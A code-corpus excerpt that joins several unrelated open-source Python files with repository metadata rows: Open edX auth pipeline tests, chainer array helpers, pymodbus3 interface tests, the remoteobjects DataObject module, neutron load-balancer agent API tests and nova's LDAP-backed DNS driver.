request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_REGISTER, redirect_uri='social:complete')
# Create a colliding username in the backend, then proceed with
# assignment via pipeline to make sure a distinct username is created.
strategy.storage.user.create_user(username=self.get_username(), email='[email protected]', password='password')
backend = strategy.request.backend
backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# pylint: disable=protected-access
self.assert_redirect_to_register_looks_correct(actions.do_complete(backend, social_views._do_login))
distinct_username = pipeline.get(request)['kwargs']['username']
self.assertNotEqual(original_username, distinct_username)
def test_new_account_registration_fails_if_email_exists(self):
request, strategy = self.get_request_and_strategy(
auth_entry=pipeline.AUTH_ENTRY_REGISTER, redirect_uri='social:complete')
backend = strategy.request.backend
backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# pylint: disable=protected-access
self.assert_redirect_to_register_looks_correct(actions.do_complete(backend, social_views._do_login))
with self._patch_edxmako_current_request(request):
self.assert_register_response_in_pipeline_looks_correct(
student_views.register_user(strategy.request),
pipeline.get(request)['kwargs'],
['name', 'username', 'email']
)
with self._patch_edxmako_current_request(strategy.request):
strategy.request.POST = self.get_registration_post_vars()
# Create twice: once successfully, and once causing a collision.
student_views.create_account(strategy.request)
self.assert_json_failure_response_is_username_collision(student_views.create_account(strategy.request))
def test_pipeline_raises_auth_entry_error_if_auth_entry_invalid(self):
auth_entry = 'invalid'
self.assertNotIn(auth_entry, pipeline._AUTH_ENTRY_CHOICES) # pylint: disable=protected-access
_, strategy = self.get_request_and_strategy(auth_entry=auth_entry, redirect_uri='social:complete')
with self.assertRaises(pipeline.AuthEntryError):
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
def test_pipeline_raises_auth_entry_error_if_auth_entry_missing(self):
_, strategy = self.get_request_and_strategy(auth_entry=None, redirect_uri='social:complete')
with self.assertRaises(pipeline.AuthEntryError):
strategy.request.backend.auth_complete = mock.MagicMock(return_value=self.fake_auth_complete(strategy))
# pylint: disable=test-inherits-tests, abstract-method
@django_utils.override_settings(ECOMMERCE_API_URL=TEST_API_URL)
class Oauth2IntegrationTest(IntegrationTest):
"""Base test case for integration tests of Oauth2 providers."""
# Dict of string -> object. Information about the token granted to the
# user. Override with test values in subclass; None to force a throw.
TOKEN_RESPONSE_DATA = None
# Dict of string -> object. Information about the user themself. Override
# with test values in subclass; None to force a throw.
USER_RESPONSE_DATA = None
def get_response_data(self):
"""Gets dict (string -> object) of merged data about the user."""
response_data = dict(self.TOKEN_RESPONSE_DATA)
response_data.update(self.USER_RESPONSE_DATA)
return response_data
| agpl-3.0 | -8,740,238,712,259,354,000 | 50.672594 | 122 | 0.682544 | false |
niboshi/chainer | chainer/utils/array.py | 10 | 1688 | import warnings
import numpy
import six
import chainer
from chainer.backends import cuda
def as_vec(x):
warnings.warn(
'chainer.utils.array.as_vec is deprecated. Please refer to '
'numpy.ravel or other array backend functions to flatten ndarrays.',
DeprecationWarning)
if x.ndim == 1:
return x
return x.ravel()
def as_mat(x):
warnings.warn(
'chainer.utils.array.as_mat is deprecated. Please refer to '
'numpy.reshape or other array backend functions to reshape ndarrays.',
DeprecationWarning)
if x.ndim == 2:
return x
return x.reshape(len(x), -1)
def empty_like(x):
warnings.warn(
'chainer.utils.array.empty_like is deprecated. Please refer to '
'numpy.empty_like or other array backend functions to initialize '
'empty arrays.',
DeprecationWarning)
if cuda.available and isinstance(x, cuda.ndarray):
return cuda.cupy.empty_like(x)
else:
return numpy.empty_like(x)
def size_of_shape(shape):
size = 1
for i in shape:
size *= i
# should not return long in Python 2
return int(size)
def sum_to(x, shape):
if x.shape == shape:
return x
if isinstance(x, chainer.Variable):
raise TypeError(
'chainer.utils.sum_to does not support Variable input. '
'Use chainer.functions.sum_to instead.')
ndim = len(shape)
lead = x.ndim - ndim
lead_axis = tuple(six.moves.range(lead))
axis = tuple([i + lead for i, sx in enumerate(shape) if sx == 1])
y = x.sum(lead_axis + axis, keepdims=True)
if lead > 0:
y = y.squeeze(lead_axis)
return y
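# Added worked example (comment only, not in the original source): summing a
# (2, 3, 4) array down to shape (3, 1) reduces the single leading axis first,
# then the trailing axis whose target length is 1:
#
#     x = numpy.arange(24).reshape(2, 3, 4)
#     y = sum_to(x, (3, 1))        # y.shape == (3, 1)
#
# which is equivalent to x.sum(axis=(0, 2), keepdims=True) with the leading
# axis squeezed away.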
| mit | -1,171,037,528,298,418,000 | 24.969231 | 78 | 0.626185 | false |
gregorschatz/pymodbus3 | test/test_interfaces.py | 2 | 2632 | import unittest
from pymodbus3.interfaces import *
class _SingleInstance(Singleton):
pass
class ModbusInterfaceTestsTest(unittest.TestCase):
"""
This is the unittest for the pymodbus3.interfaces module
"""
def setUp(self):
""" Initializes the test environment """
pass
def tearDown(self):
""" Cleans up the test environment """
pass
def test_singleton_interface(self):
""" Test that the singleton interface works """
first = _SingleInstance()
second = _SingleInstance()
self.assertEquals(first, second)
def test_modbus_decoder_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IModbusDecoder()
self.assertRaises(NotImplementedError, lambda: instance.decode(x))
self.assertRaises(NotImplementedError, lambda: instance.lookup_pdu_class(x))
def test_modbus_framer_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IModbusFramer()
self.assertRaises(NotImplementedError, instance.check_frame)
self.assertRaises(NotImplementedError, instance.advance_frame)
self.assertRaises(NotImplementedError, instance.is_frame_ready)
self.assertRaises(NotImplementedError, instance.get_frame)
self.assertRaises(NotImplementedError, lambda: instance.add_to_frame(x))
self.assertRaises(NotImplementedError, lambda: instance.populate_result(x))
self.assertRaises(NotImplementedError, lambda: instance.process_incoming_packet(x, x))
self.assertRaises(NotImplementedError, lambda: instance.build_packet(x))
def test_modbus_slave_context_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IModbusSlaveContext()
self.assertRaises(NotImplementedError, instance.reset)
self.assertRaises(NotImplementedError, lambda: instance.validate(x, x, x))
self.assertRaises(NotImplementedError, lambda: instance.get_values(x, x, x))
self.assertRaises(NotImplementedError, lambda: instance.set_values(x, x, x))
def test_modbus_payload_builder_interface(self):
""" Test that the base class isn't implemented """
x = None
instance = IPayloadBuilder()
self.assertRaises(NotImplementedError, lambda: instance.build())
#---------------------------------------------------------------------------#
# Main
#---------------------------------------------------------------------------#
if __name__ == "__main__":
unittest.main()
| bsd-3-clause | -7,825,868,380,045,185,000 | 38.283582 | 94 | 0.639818 | false |
alex/remoteobjects | remoteobjects/dataobject.py | 1 | 9213 | # Copyright (c) 2009 Six Apart Ltd.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of Six Apart Ltd. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
`DataObject` is a class of object that provides coding between object
attributes and dictionaries, suitable for serializing objects to and from
simple dictionary representations (such as decoded JSON).
`DataObject` supplies the mechanism for converting between dictionaries and
objects. These conversions are performed with the aid of `Field` instances
declared on `DataObject` subclasses. `Field` classes reside in the
`remoteobjects.field` module.
"""
from copy import deepcopy
import logging
import remoteobjects.fields
classes_by_name = {}
classes_by_constant_field = {}
def find_by_name(name):
"""Finds and returns the DataObject subclass with the given name.
Parameter `name` should be a bare class name with no module. If there is
no class by that name, raises `KeyError`.
"""
return classes_by_name[name]
class DataObjectMetaclass(type):
"""Metaclass for `DataObject` classes.
This metaclass installs all `remoteobjects.fields.Property` instances
declared as attributes of the new class, including all `Field` and `Link`
instances.
This metaclass also makes the new class findable through the
`dataobject.find_by_name()` function.
"""
def __new__(cls, name, bases, attrs):
"""Creates and returns a new `DataObject` class with its declared
fields and name."""
fields = {}
new_fields = {}
new_properties = {}
# Inherit all the parent DataObject classes' fields.
for base in bases:
if isinstance(base, DataObjectMetaclass):
fields.update(base.fields)
# Move all the class's attributes that are Fields to the fields set.
for attrname, field in attrs.items():
if isinstance(field, remoteobjects.fields.Property):
new_properties[attrname] = field
if isinstance(field, remoteobjects.fields.Field):
new_fields[attrname] = field
elif attrname in fields:
# Throw out any parent fields that the subclass defined as
# something other than a Field.
del fields[attrname]
fields.update(new_fields)
attrs['fields'] = fields
obj_cls = super(DataObjectMetaclass, cls).__new__(cls, name, bases, attrs)
for field, value in new_properties.items():
obj_cls.add_to_class(field, value)
# Register the new class so Object fields can have forward-referenced it.
classes_by_name[name] = obj_cls
# Tell this class's fields what this class is, so they can find their
# forward references later.
for field in new_properties.values():
field.of_cls = obj_cls
return obj_cls
def add_to_class(cls, name, value):
try:
value.install(name, cls)
except (NotImplementedError, AttributeError):
setattr(cls, name, value)
class DataObject(object):
"""An object that can be decoded from or encoded as a dictionary.
DataObject subclasses should be declared with their different data
attributes defined as instances of fields from the `remoteobjects.fields`
module. For example:
>>> from remoteobjects import DataObject, fields
>>> class Asset(DataObject):
... name = fields.Field()
... updated = fields.Datetime()
... author = fields.Object('Author')
...
A DataObject's fields then provide the coding between live DataObject
instances and dictionaries.
"""
__metaclass__ = DataObjectMetaclass
def __init__(self, **kwargs):
"""Initializes a new `DataObject` with the given field values."""
self.api_data = {}
self.__dict__.update(kwargs)
def __eq__(self, other):
"""Returns whether two `DataObject` instances are equivalent.
If the `DataObject` instances are of the same type and contain the
same data in all their fields, the objects are equivalent.
"""
if type(self) != type(other):
return False
for k, v in self.fields.iteritems():
if isinstance(v, remoteobjects.fields.Field):
if getattr(self, k) != getattr(other, k):
return False
return True
def __ne__(self, other):
"""Returns whether two `DataObject` instances are different.
`DataObject` instances are different if they are not equivalent as
determined through `__eq__()`.
"""
return not self == other
@classmethod
def statefields(cls):
return cls.fields.keys() + ['api_data']
def __getstate__(self):
return dict((k, self.__dict__[k]) for k in self.statefields()
if k in self.__dict__)
def to_dict(self):
"""Encodes the DataObject to a dictionary."""
data = deepcopy(self.api_data)
for field_name, field in self.fields.iteritems():
value = getattr(self, field.attrname, None)
if value is not None:
data[field.api_name] = field.encode(value)
return data
@classmethod
def from_dict(cls, data):
"""Decodes a dictionary into a new `DataObject` instance."""
self = cls()
self.update_from_dict(data)
return self
def update_from_dict(self, data):
"""Adds the content of a dictionary to this DataObject.
Parameter `data` is the dictionary from which to update the object.
Use this only when receiving newly updated or partial content for a
DataObject; that is, when the data is from the outside data source and
needs decoded through the object's fields. Data from "inside" your
application should be added to an object manually by setting the
object's attributes. Data that constitutes a new object should be
turned into another object with `from_dict()`.
"""
if not isinstance(data, dict):
raise TypeError
# Clear any local instance field data
for k in self.fields.iterkeys():
if k in self.__dict__:
del self.__dict__[k]
self.api_data = data
@classmethod
def subclass_with_constant_field(cls, fieldname, value):
"""Returns the closest subclass of this class that has a `Constant`
field with the given value.
Use this method in combination with the `fields.Constant` field class
to find the most appropriate subclass of `cls` based on a content
field. For example, if you have an ``Asset`` class, but want to
declare subclasses with special behavior based on the ``kind`` field
of the ``Asset`` instances, declare ``kind`` as a `Constant` field on
each subclass. Then when you want to create a new ``Asset`` instance
(as in ``Asset.from_dict()``), you can use this method to select a
more appropriate class to instantiate.
Parameters `fieldname` and `value` are the name and value of the
`Constant` field for which to search respectively.
If a subclass of `cls` has been declared with a `Constant` field of
the given name and value, it will be returned. If multiple subclasses
of `cls` declare a matching `Constant` field, one of the matching
subclasses will be returned, but which subclass is not defined.
"""
try:
clsname = classes_by_constant_field[fieldname][tuple(value)]
except KeyError:
# No matching classes, then.
pass
else:
return find_by_name(clsname)
raise ValueError('No such subclass of %s with field %r equivalent to %r'
% (cls.__name__, fieldname, value))
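# Added illustrative sketch (comment only): pairing subclass_with_constant_field()
# with a ``fields.Constant`` declaration might look like the following; the class
# names and the exact Constant constructor arguments are hypothetical, and the
# example assumes ``from remoteobjects import DataObject, fields``:
#
#     class Asset(DataObject):
#         kind = fields.Field()
#
#     class Photo(Asset):
#         kind = fields.Constant('photo')
#
#     cls = Asset.subclass_with_constant_field('kind', 'photo')   # -> Photo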
| bsd-3-clause | -8,214,878,308,252,101,000 | 35.852 | 82 | 0.655704 | false |
cernops/neutron | neutron/tests/unit/services/loadbalancer/agent/test_api.py | 6 | 4603 | # Copyright 2013 New Dream Network, LLC (DreamHost)
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.services.loadbalancer.agent import agent_api as api
from neutron.tests import base
class TestApiCache(base.BaseTestCase):
def setUp(self):
super(TestApiCache, self).setUp()
self.api = api.LbaasAgentApi('topic', mock.sentinel.context, 'host')
self.make_msg = mock.patch.object(self.api, 'make_msg').start()
self.mock_call = mock.patch.object(self.api, 'call').start()
def test_init(self):
self.assertEqual(self.api.host, 'host')
self.assertEqual(self.api.context, mock.sentinel.context)
def test_get_ready_devices(self):
self.assertEqual(
self.api.get_ready_devices(),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with('get_ready_devices', host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_get_logical_device(self):
self.assertEqual(
self.api.get_logical_device('pool_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'get_logical_device',
pool_id='pool_id')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_pool_destroyed(self):
self.assertEqual(
self.api.pool_destroyed('pool_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'pool_destroyed',
pool_id='pool_id')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_pool_deployed(self):
self.assertEqual(
self.api.pool_deployed('pool_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'pool_deployed',
pool_id='pool_id')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_update_status(self):
self.assertEqual(
self.api.update_status('pool', 'pool_id', 'ACTIVE'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'update_status',
obj_type='pool',
obj_id='pool_id',
status='ACTIVE')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value,
)
def test_plug_vip_port(self):
self.assertEqual(
self.api.plug_vip_port('port_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'plug_vip_port',
port_id='port_id',
host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_unplug_vip_port(self):
self.assertEqual(
self.api.unplug_vip_port('port_id'),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'unplug_vip_port',
port_id='port_id',
host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
def test_update_pool_stats(self):
self.assertEqual(
self.api.update_pool_stats('pool_id', {'stat': 'stat'}),
self.mock_call.return_value
)
self.make_msg.assert_called_once_with(
'update_pool_stats',
pool_id='pool_id',
stats={'stat': 'stat'},
host='host')
self.mock_call.assert_called_once_with(
mock.sentinel.context,
self.make_msg.return_value
)
| apache-2.0 | 8,646,123,773,261,513,000 | 28.88961 | 79 | 0.578318 | false |
nitrocode/challenge-questionaire | app/app.py | 1 | 2601 | #!/usr/bin/env python
import questions
import json
from flask import Flask, render_template, request
# this has to be defined here
app = Flask(__name__)
app.config['DEBUG'] = True
qdata = None
@app.route('/')
def test():
return render_template('test.html')
@app.route('/edit')
def edit():
return render_template('edit.html')
def get_questions(page=None):
"""Get the questions and answers and store in a global variable.
:return: list of JSON documents
:rtype: list
"""
global qdata
page_size = 10
# g does not persist the global variable for some reason...
# qdata = getattr(g, '_questions', None)
if qdata is None:
# qdata = g._questions = questions.parse()
qdata = questions.parse()
    try:
        page = int(page)
    except (TypeError, ValueError):
        # No usable page number was given; return the full question list.
        return qdata
    # Serve the requested page; the final page may be only partially filled.
    num_pages = (len(qdata) + page_size - 1) // page_size
    if 0 < page <= num_pages:
        return qdata[(page - 1) * page_size:page * page_size]
    return qdata
@app.route('/questions')
@app.route('/questions/')
@app.route('/questions/<int:page>')
def all_questions(page=None):
"""Return all questions by page.
:param int page: id
:return:
:rtype: dict
"""
questions = get_questions(page=page)
return json.dumps({
'data': questions,
'count': len(questions)
})
@app.route('/question/',
methods=['POST'], defaults={'qid':-1})
@app.route('/question/<int:qid>',
methods=['PUT', 'GET', 'DELETE'])
def question(qid):
"""Get or modify a question.
:param int qid: question id
:return: question and answers
:rtype: str
"""
global qdata
tmp_qdata = get_questions()
try:
tmp_qdata[int(qid)]
except:
qid = 0
# return a question as a JSON object
if request.method == 'GET':
return json.dumps(tmp_qdata[qid])
# insert/modify the question
elif request.method in ['PUT', 'POST']:
data = {
'answer': request.form['answer'],
'question': request.form['question'],
'distractors': request.form.getlist('distractors[]')
}
# modify the question
if request.method == 'PUT':
data['id'] = qid
tmp_qdata[qid] = data
print(tmp_qdata[qid])
# insert new question
else:
data['id'] = tmp_qdata[-1]['id'] + 1
tmp_qdata.append(data)
# remove from array
elif request.method in ['DELETE']:
del tmp_qdata[qid]
qdata = tmp_qdata
return ''
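# Hypothetical requests against the routes above (host/port are assumptions,
# the paths come straight from the decorators):
#   GET    /questions/2   -> second page of questions as JSON
#   GET    /question/3    -> question at index 3
#   POST   /question/     -> append a new question (form fields: question,
#                            answer, distractors[])
#   PUT    /question/3    -> replace question 3 with the submitted form
#   DELETE /question/3    -> drop question 3 from the in-memory list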
if __name__ == '__main__':
app.run()
| mit | 7,117,368,930,344,871,000 | 22.862385 | 68 | 0.569781 | false |
NewpTone/stacklab-nova | nova/network/ldapdns.py | 7 | 13353 | # Copyright 2012 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ldap
import time
from nova.auth import fakeldap
from nova import exception
from nova import flags
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova import utils
LOG = logging.getLogger(__name__)
ldap_dns_opts = [
cfg.StrOpt('ldap_dns_url',
default='ldap://ldap.example.com:389',
help='URL for ldap server which will store dns entries'),
cfg.StrOpt('ldap_dns_user',
default='uid=admin,ou=people,dc=example,dc=org',
help='user for ldap DNS'),
cfg.StrOpt('ldap_dns_password',
default='password',
help='password for ldap DNS'),
cfg.StrOpt('ldap_dns_soa_hostmaster',
default='[email protected]',
help='Hostmaster for ldap dns driver Statement of Authority'),
cfg.MultiStrOpt('ldap_dns_servers',
default=['dns.example.org'],
help='DNS Servers for ldap dns driver'),
cfg.StrOpt('ldap_dns_base_dn',
default='ou=hosts,dc=example,dc=org',
help='Base DN for DNS entries in ldap'),
cfg.StrOpt('ldap_dns_soa_refresh',
default='1800',
help='Refresh interval (in seconds) for ldap dns driver '
'Statement of Authority'),
cfg.StrOpt('ldap_dns_soa_retry',
default='3600',
help='Retry interval (in seconds) for ldap dns driver '
'Statement of Authority'),
cfg.StrOpt('ldap_dns_soa_expiry',
default='86400',
help='Expiry interval (in seconds) for ldap dns driver '
'Statement of Authority'),
cfg.StrOpt('ldap_dns_soa_minimum',
default='7200',
help='Minimum interval (in seconds) for ldap dns driver '
'Statement of Authority'),
]
flags.FLAGS.register_opts(ldap_dns_opts)
# Importing ldap.modlist breaks the tests for some reason,
# so this is an abbreviated version of a function from
# there.
def create_modlist(newattrs):
modlist = []
for attrtype in newattrs.keys():
utf8_vals = []
for val in newattrs[attrtype]:
utf8_vals.append(utils.utf8(val))
newattrs[attrtype] = utf8_vals
modlist.append((attrtype, newattrs[attrtype]))
return modlist
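# Rough illustration of create_modlist() (attribute values invented):
#   create_modlist({'dc': ['example'], 'aRecord': ['10.0.0.1']})
#   -> [('dc', ['example']), ('aRecord', ['10.0.0.1'])]
# i.e. the (attrtype, values) pairs expected by lobj.add_s(), with every
# value first run through utils.utf8().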
class DNSEntry(object):
def __init__(self, ldap_object):
"""ldap_object is an instance of ldap.LDAPObject.
It should already be initialized and bound before
getting passed in here."""
self.lobj = ldap_object
self.ldap_tuple = None
self.qualified_domain = None
@classmethod
def _get_tuple_for_domain(cls, lobj, domain):
entry = lobj.search_s(flags.FLAGS.ldap_dns_base_dn, ldap.SCOPE_SUBTREE,
'(associatedDomain=%s)' % utils.utf8(domain))
if not entry:
return None
if len(entry) > 1:
LOG.warn("Found multiple matches for domain %s.\n%s" %
(domain, entry))
return entry[0]
@classmethod
def _get_all_domains(cls, lobj):
entries = lobj.search_s(flags.FLAGS.ldap_dns_base_dn,
ldap.SCOPE_SUBTREE, '(sOARecord=*)')
domains = []
for entry in entries:
domain = entry[1].get('associatedDomain')
if domain:
domains.append(domain[0])
return domains
def _set_tuple(self, tuple):
self.ldap_tuple = tuple
def _qualify(self, name):
return '%s.%s' % (name, self.qualified_domain)
def _dequalify(self, name):
z = ".%s" % self.qualified_domain
if name.endswith(z):
dequalified = name[0:name.rfind(z)]
else:
LOG.warn("Unable to dequalify. %s is not in %s.\n" %
(name, self.qualified_domain))
dequalified = None
return dequalified
def _dn(self):
return self.ldap_tuple[0]
dn = property(_dn)
def _rdn(self):
return self.dn.partition(',')[0]
rdn = property(_rdn)
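# Sketch of the naming helpers above (example values only, not taken from a
# real directory): for an entry whose dn is
# 'dc=www,dc=example.org,ou=hosts,dc=example,dc=org', wrapped by a DomainEntry
# for 'example.org':
#   entry.rdn                            -> 'dc=www'
#   entry._qualify('www')                -> 'www.example.org'
#   entry._dequalify('www.example.org')  -> 'www'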
class DomainEntry(DNSEntry):
@classmethod
def _soa(cls):
date = time.strftime('%Y%m%d%H%M%S')
soa = '%s %s %s %s %s %s %s' % (
flags.FLAGS.ldap_dns_servers[0],
flags.FLAGS.ldap_dns_soa_hostmaster,
date,
flags.FLAGS.ldap_dns_soa_refresh,
flags.FLAGS.ldap_dns_soa_retry,
flags.FLAGS.ldap_dns_soa_expiry,
flags.FLAGS.ldap_dns_soa_minimum)
return utils.utf8(soa)
@classmethod
def create_domain(cls, lobj, domain):
"""Create a new domain entry, and return an object that wraps it."""
entry = cls._get_tuple_for_domain(lobj, domain)
if entry:
raise exception.FloatingIpDNSExists(name=domain, domain='')
newdn = 'dc=%s,%s' % (domain, flags.FLAGS.ldap_dns_base_dn)
attrs = {'objectClass': ['domainrelatedobject', 'dnsdomain',
'domain', 'dcobject', 'top'],
'sOARecord': [cls._soa()],
'associatedDomain': [domain],
'dc': [domain]}
lobj.add_s(newdn, create_modlist(attrs))
return DomainEntry(lobj, domain)
def __init__(self, ldap_object, domain):
super(DomainEntry, self).__init__(ldap_object)
entry = self._get_tuple_for_domain(self.lobj, domain)
if not entry:
raise exception.NotFound()
self._set_tuple(entry)
assert(entry[1]['associatedDomain'][0] == domain)
self.qualified_domain = domain
def delete(self):
"""Delete the domain that this entry refers to."""
entries = self.lobj.search_s(self.dn,
ldap.SCOPE_SUBTREE,
'(aRecord=*)')
for entry in entries:
self.lobj.delete_s(entry[0])
self.lobj.delete_s(self.dn)
def update_soa(self):
mlist = [(ldap.MOD_REPLACE, 'sOARecord', self._soa())]
self.lobj.modify_s(self.dn, mlist)
def subentry_with_name(self, name):
entry = self.lobj.search_s(self.dn, ldap.SCOPE_SUBTREE,
'(associatedDomain=%s.%s)' %
(utils.utf8(name),
utils.utf8(self.qualified_domain)))
if entry:
return HostEntry(self, entry[0])
else:
return None
def subentries_with_ip(self, ip):
entries = self.lobj.search_s(self.dn, ldap.SCOPE_SUBTREE,
'(aRecord=%s)' % utils.utf8(ip))
objs = []
for entry in entries:
if 'associatedDomain' in entry[1]:
objs.append(HostEntry(self, entry))
return objs
    def add_entry(self, name, address):
        if self.subentry_with_name(name):
            raise exception.FloatingIpDNSExists(name=name,
                                                domain=self.qualified_domain)
        entries = self.subentries_with_ip(address)
        if entries:
            # We already have an ldap entry for this IP, so we just
            # need to add the new name.
            existingdn = entries[0].dn
            self.lobj.modify_s(existingdn, [(ldap.MOD_ADD,
                                             'associatedDomain',
                                             utils.utf8(self._qualify(name)))])
        else:
            # We need to create an entirely new entry.
            newdn = 'dc=%s,%s' % (name, self.dn)
            attrs = {'objectClass': ['domainrelatedobject', 'dnsdomain',
                                     'domain', 'dcobject', 'top'],
                     'aRecord': [address],
                     'associatedDomain': [self._qualify(name)],
                     'dc': [name]}
            self.lobj.add_s(newdn, create_modlist(attrs))
        # Bump the SOA serial before returning; this call was previously
        # unreachable because both branches returned above it.
        self.update_soa()
        return self.subentry_with_name(name)
def remove_entry(self, name):
entry = self.subentry_with_name(name)
if not entry:
raise exception.NotFound()
entry.remove_name(name)
self.update_soa()
class HostEntry(DNSEntry):
def __init__(self, parent, tuple):
super(HostEntry, self).__init__(parent.lobj)
self.parent_entry = parent
self._set_tuple(tuple)
self.qualified_domain = parent.qualified_domain
def remove_name(self, name):
names = self.ldap_tuple[1]['associatedDomain']
if not names:
raise exception.NotFound()
if len(names) > 1:
# We just have to remove the requested domain.
self.lobj.modify_s(self.dn, [(ldap.MOD_DELETE, 'associatedDomain',
self._qualify(utils.utf8(name)))])
if (self.rdn[1] == name):
# We just removed the rdn, so we need to move this entry.
names.remove(self._qualify(name))
newrdn = 'dc=%s' % self._dequalify(names[0])
self.lobj.modrdn_s(self.dn, [newrdn])
else:
# We should delete the entire record.
self.lobj.delete_s(self.dn)
def modify_address(self, name, address):
names = self.ldap_tuple[1]['associatedDomain']
if not names:
raise exception.NotFound()
if len(names) == 1:
self.lobj.modify_s(self.dn, [(ldap.MOD_REPLACE, 'aRecord',
[utils.utf8(address)])])
else:
self.remove_name(name)
self.parent.add_entry(name, address)
def _names(self):
names = []
for domain in self.ldap_tuple[1]['associatedDomain']:
names.append(self._dequalify(domain))
return names
names = property(_names)
def _ip(self):
ip = self.ldap_tuple[1]['aRecord'][0]
return ip
ip = property(_ip)
def _parent(self):
return self.parent_entry
parent = property(_parent)
class LdapDNS(object):
"""Driver for PowerDNS using ldap as a back end.
This driver assumes ldap-method=strict, with all domains
in the top-level, aRecords only."""
def __init__(self):
self.lobj = ldap.initialize(flags.FLAGS.ldap_dns_url)
self.lobj.simple_bind_s(flags.FLAGS.ldap_dns_user,
flags.FLAGS.ldap_dns_password)
def get_domains(self):
return DomainEntry._get_all_domains(self.lobj)
def create_entry(self, name, address, type, domain):
if type.lower() != 'a':
raise exception.InvalidInput(_("This driver only supports "
"type 'a' entries."))
dEntry = DomainEntry(self.lobj, domain)
dEntry.add_entry(name, address)
def delete_entry(self, name, domain):
dEntry = DomainEntry(self.lobj, domain)
dEntry.remove_entry(name)
def get_entries_by_address(self, address, domain):
try:
dEntry = DomainEntry(self.lobj, domain)
except exception.NotFound:
return []
entries = dEntry.subentries_with_ip(address)
names = []
for entry in entries:
names.extend(entry.names)
return names
def get_entries_by_name(self, name, domain):
try:
dEntry = DomainEntry(self.lobj, domain)
except exception.NotFound:
return []
nEntry = dEntry.subentry_with_name(name)
if nEntry:
return [nEntry.ip]
def modify_address(self, name, address, domain):
dEntry = DomainEntry(self.lobj, domain)
nEntry = dEntry.subentry_with_name(name)
nEntry.modify_address(name, address)
def create_domain(self, domain):
DomainEntry.create_domain(self.lobj, domain)
def delete_domain(self, domain):
dEntry = DomainEntry(self.lobj, domain)
dEntry.delete()
def delete_dns_file(self):
LOG.warn("This shouldn't be getting called except during testing.")
pass
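# Hedged usage sketch for the driver above (domain and address are invented;
# in nova the driver is normally instantiated by the network manager):
#   driver = LdapDNS()
#   driver.create_domain('example.org')
#   driver.create_entry('www', '10.0.0.1', 'a', 'example.org')
#   driver.get_entries_by_name('www', 'example.org')          # -> ['10.0.0.1']
#   driver.get_entries_by_address('10.0.0.1', 'example.org')  # -> ['www']
#   driver.delete_entry('www', 'example.org')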
class FakeLdapDNS(LdapDNS):
"""For testing purposes, a DNS driver backed with a fake ldap driver."""
def __init__(self):
self.lobj = fakeldap.FakeLDAP()
attrs = {'objectClass': ['domainrelatedobject', 'dnsdomain',
'domain', 'dcobject', 'top'],
'associateddomain': ['root'],
'dc': ['root']}
self.lobj.add_s(flags.FLAGS.ldap_dns_base_dn, create_modlist(attrs))
